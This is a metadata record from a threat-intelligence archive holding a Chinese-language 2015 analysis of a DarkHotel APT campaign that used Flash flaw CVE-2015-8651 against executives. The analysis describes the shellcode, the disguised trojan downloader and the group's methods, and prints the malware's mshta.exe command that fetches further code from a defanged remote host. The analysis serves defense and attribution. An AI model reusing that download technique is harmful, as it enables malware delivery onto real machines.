{
	"id": "c6621810-85cb-4e60-9e5d-49faf6a7c89d",
	"created_at": "2026-04-06T00:15:37.678518Z",
	"updated_at": "2026-04-10T13:11:47.660176Z",
	"deleted_at": null,
	"sha1_hash": "a97130b68e7c63d0c91e26e358f68e9d133c3936",
	"title": "境外“暗黑客栈”组织对国内企业高管发起APT攻击 | WooYun知识库",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 861244,
	"plain_text": "境外“暗黑客栈”组织对国内企业高管发起APT攻击 | WooYun知识\r\n库\r\nBy 小白帽\r\nPublished: 2015-12-31 · Archived: 2026-04-05 17:45:14 UTC\r\n· 2015/12/31 18:23\r\n当你启程前往伊萨卡，但愿你的道路漫长，充满奇迹，充满发现——卡瓦菲斯 希腊\r\n以此纪念2015，即将逝去的中国威胁情报元年。\r\nAuthor:ThreatBook\r\n0x00 摘要\r\nAdobe于12月28日发布了一个应急补丁用于修复Flash 播放器的多个安全漏洞。有线索表明其中之一已被\r\n用于APT(高级可持续性)攻击，国外有媒体揣测其攻击目标为国内某著名IT企业\r\n（http://www.theregister.co.uk/2015/12/28/adobe_flash_security_update/），微步在线尚未发现任何证据支持\r\n此结论。但溯源分析表明确有境外黑客团伙利用此漏洞针对中国及亚洲企业的高管发起APT攻击，此团伙\r\n即代号为暗黑客栈（DarkHotel） 的APT攻击组织。现阶段尚不确定此攻击是否有更复杂的背景。微步在\r\n线已第一时间向客户发送预警。\r\n我们建议企业高管们立即采取以下措施：\r\n1. 立即升级Flash播放器；\r\n2. 不要点击陌生邮件的附件或链接；\r\n3. 连接酒店WIFI请慎重，收发敏感信息可用移动通信网络。\r\n0x01 威胁事件分析\r\nhttps://web.archive.org/web/20160104165148/http://drops.wooyun.org/tips/11726\r\nPage 1 of 4\n\n在Adobe于12月28日发布的19个安全漏洞的应急（OOB）补丁中，CVE-2015-8651 被Adobe 标注为已用于\r\nAPT攻击。微步在线通过对多宗活跃APT威胁事件的跟踪及对CVE-2015-8651攻击的分析，确定了攻击流\r\n及攻击者身份。\r\n通过对捕获的可疑SWF文件进行分析，确认此样本利用了Adobe Flash整数溢出漏洞 (即此次Adobe修复的\r\nCVE-2015-8651漏洞)。受攻击者访问此SWF文件后，漏洞利用成功会跳转到下面这段shellcode:\r\n其主要功能是下载一个名为update.exe 的文件到系统 的%temp% 目录下， 通过RC4解密并且通过ECHO加可\r\n执行文件的“MZ”头来构建有效的PE文件，然后运行。\r\nUpdate.exe约1.3Mb, 具有完整的文件属性，伪装成SSH密钥生成工具：\r\n通过逆向分析发现，木马作者篡改和裁剪了正常的OpenSSL文件，篡改后的版本只提供一个参数： -\r\ngenkeypair 。无论是否传递此参数，木马文件都会首先释放一个公钥在当前目录用于干扰判断，同时进入\r\n真正的恶意代码部分。此样本未进行代码混淆，但是采用了多种反调试/反虚拟机技术及字段加密，通过\r\n检测各种系统环境来判断是否有反病毒软件及沙箱存在，比如：\r\nhttps://web.archive.org/web/20160104165148/http://drops.wooyun.org/tips/11726\r\nPage 2 of 4\n\nUpdate.exe是一个Trojan Downloader， 利用执行mshta.exe 来下载木马文件，木马文件服务器位于冰岛。形\r\n式如下：\r\nC:\\Windows\\system32\\mshta.exe hxxp://****.com/image/read.php…..\r\n0x02 攻击团伙分析\r\n随着对此攻击事件的目标、工具、手法和过程更详细的分析，我们发现其特点和暗黑客栈（Darkhotel）\r\n有着非常惊人的一致。\r\n暗黑客栈（Darkhotel）APT攻击团伙的踪迹最早可以追溯到2007年，其从2010年开始更多的利用企业高管\r\n在商业旅行中访问酒店网络的时机，进行APT攻击来窃取信息。因此在2014年卡巴斯基发布针对此团队的\r\n研究报告时，将其命名为“Darkhotel”。此团伙攻击目标集中在亚太地区开展业务和投资的企业高管（如：\r\nCEO、SVP、高管及高级研发人员），攻击的行业包括大型电子制造和通信、投资、国防工业、汽车等。\r\n此团队使用零日漏洞（特别是Flash类型）来进行攻击，并规避最新的防御措施，同时也会盗窃合法的数\r\n字证书为后门软件及监听工具进行签名。如果有一个目标已经被有效感染，往往就会从作案点删除他们\r\n的工具，进而隐藏自己的活动踪迹。从其行动特点看，具有极高的技术能力及充沛的资源。\r\n我们对此次事件和暗黑客栈（Darkhotel）的特点进行了对比，认为有充足理由认定其就是始作俑者。\r\nhttps://web.archive.org/web/20160104165148/http://drops.wooyun.org/tips/11726\r\nPage 3 of 4\n\n0x03 小结\r\n通过此事件，我们再次认识到在万物互联的年代，单纯基于漏洞的防御往往是防不胜防。只要有足够的\r\n价值，黑客就有足够的投入和机会攻陷目标。我们需要及时的调整防御思路，平衡安全投入，更多的聚\r\n焦威胁，以威胁情报驱动安全体系建设，建立防御、检测、响应及预防一套完整的安全自适应过程。\r\nSource: https://web.archive.org/web/20160104165148/http://drops.wooyun.org/tips/11726\r\nhttps://web.archive.org/web/20160104165148/http://drops.wooyun.org/tips/11726\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "ZH",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://web.archive.org/web/20160104165148/http://drops.wooyun.org/tips/11726"
	],
	"report_names": [
		"11726"
	],
	"threat_actors": [
		{
			"id": "1dadf04e-d725-426f-9f6c-08c5be7da159",
			"created_at": "2022-10-25T15:50:23.624538Z",
			"updated_at": "2026-04-10T02:00:05.286895Z",
			"deleted_at": null,
			"main_name": "Darkhotel",
			"aliases": [
				"Darkhotel",
				"DUBNIUM",
				"Zigzag Hail"
			],
			"source_name": "MITRE:Darkhotel",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b13c19d6-247d-47ba-86ba-15a94accc179",
			"created_at": "2024-05-01T02:03:08.149923Z",
			"updated_at": "2026-04-10T02:00:03.763147Z",
			"deleted_at": null,
			"main_name": "TUNGSTEN BRIDGE",
			"aliases": [
				"APT-C-06 ",
				"ATK52 ",
				"CTG-1948 ",
				"DUBNIUM ",
				"DarkHotel ",
				"Fallout Team ",
				"Shadow Crane ",
				"Zigzag Hail "
			],
			"source_name": "Secureworks:TUNGSTEN BRIDGE",
			"tools": [
				"Nemim",
				"Tapaoux"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2b4eec94-7672-4bee-acb2-b857d0d26d12",
			"created_at": "2023-01-06T13:46:38.272109Z",
			"updated_at": "2026-04-10T02:00:02.906089Z",
			"deleted_at": null,
			"main_name": "DarkHotel",
			"aliases": [
				"T-APT-02",
				"Nemim",
				"Nemin",
				"Shadow Crane",
				"G0012",
				"DUBNIUM",
				"Karba",
				"APT-C-06",
				"SIG25",
				"TUNGSTEN BRIDGE",
				"Zigzag Hail",
				"Fallout Team",
				"Luder",
				"Tapaoux",
				"ATK52"
			],
			"source_name": "MISPGALAXY:DarkHotel",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c0cedde3-5a9b-430f-9b77-e6568307205e",
			"created_at": "2022-10-25T16:07:23.528994Z",
			"updated_at": "2026-04-10T02:00:04.642473Z",
			"deleted_at": null,
			"main_name": "DarkHotel",
			"aliases": [
				"APT-C-06",
				"ATK 52",
				"CTG-1948",
				"Dubnium",
				"Fallout Team",
				"G0012",
				"G0126",
				"Higaisa",
				"Luder",
				"Operation DarkHotel",
				"Operation Daybreak",
				"Operation Inexsmar",
				"Operation PowerFall",
				"Operation The Gh0st Remains the Same",
				"Purple Pygmy",
				"SIG25",
				"Shadow Crane",
				"T-APT-02",
				"TieOnJoe",
				"Tungsten Bridge",
				"Zigzag Hail"
			],
			"source_name": "ETDA:DarkHotel",
			"tools": [
				"Asruex",
				"DarkHotel",
				"DmaUp3.exe",
				"GreezeBackdoor",
				"Karba",
				"Nemain",
				"Nemim",
				"Ramsay",
				"Retro",
				"Tapaoux",
				"Trojan.Win32.Karba.e",
				"Virus.Win32.Pioneer.dx",
				"igfxext.exe",
				"msieckc.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434537,
	"ts_updated_at": 1775826707,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a97130b68e7c63d0c91e26e358f68e9d133c3936.pdf",
		"text": "https://archive.orkl.eu/a97130b68e7c63d0c91e26e358f68e9d133c3936.txt",
		"img": "https://archive.orkl.eu/a97130b68e7c63d0c91e26e358f68e9d133c3936.jpg"
	}
}